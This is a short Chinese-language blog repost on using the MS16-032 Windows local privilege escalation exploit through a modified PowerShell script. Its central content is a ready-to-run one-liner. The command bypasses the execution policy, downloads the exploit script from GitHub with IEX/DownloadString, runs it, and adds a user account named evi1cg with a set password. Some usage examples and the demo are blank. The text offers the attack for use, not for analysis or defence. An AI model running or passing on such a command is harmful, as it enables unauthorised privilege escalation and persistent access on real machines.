MS16-032 windows本地提权

exploit-db的详情:
      https://www.exploit-db.com/exploits/39574/

试用系统:

Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本:

Invoke-MS16-032.ps1

测试详情:

为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:

Invoke-MS16-032.ps1

使用方式如下:


      添加用户:

运行某程序:

远程加用户:

直接执行如下命令,可进行提权并添加用户:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

演示如下:

文章出处:Evi1cg's blog   

https://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

本文由来源 Evi1cg's blog,由 congtou 整理编辑,其版权均为 Evi1cg's blog 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

3

发表评论

// 360自动收录 // 360自动收录